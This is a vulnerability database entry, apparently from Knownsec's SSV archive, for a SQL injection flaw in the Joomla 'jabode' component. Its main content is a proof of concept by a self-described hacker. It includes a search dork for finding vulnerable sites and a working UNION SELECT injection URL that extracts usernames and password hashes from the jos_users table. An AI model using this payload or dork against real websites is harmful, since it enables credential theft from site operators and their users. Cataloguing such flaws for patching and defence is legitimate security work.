Joomla Component jabode (id) Remote SQL Injection Vulnerability

基本字段

漏洞编号：: SSV-8870

披露/发现时间：: 未知

提交时间：: 2008-06-29

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: Joomla!

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.65KB

/---------------------------------------------------------------\ \                                 / /       Joomla Component jabode Remote SQL injection            \ \                                 / \---------------------------------------------------------------/ [*] Author    :  His0k4 [ALGERIAN HaCkEr] [*] Dork      :  inurl:com_jabode [*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL} [*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users-- [*] Funny note:  You can change "taurus" to your sign for best results xd...                  ---------------------------------------------------------------------------- [*] Greetings :  All friends & muslims HaCkeRs... [*] Greetings2:  http://www.dz-secure.com                  http://palcastle.org/cc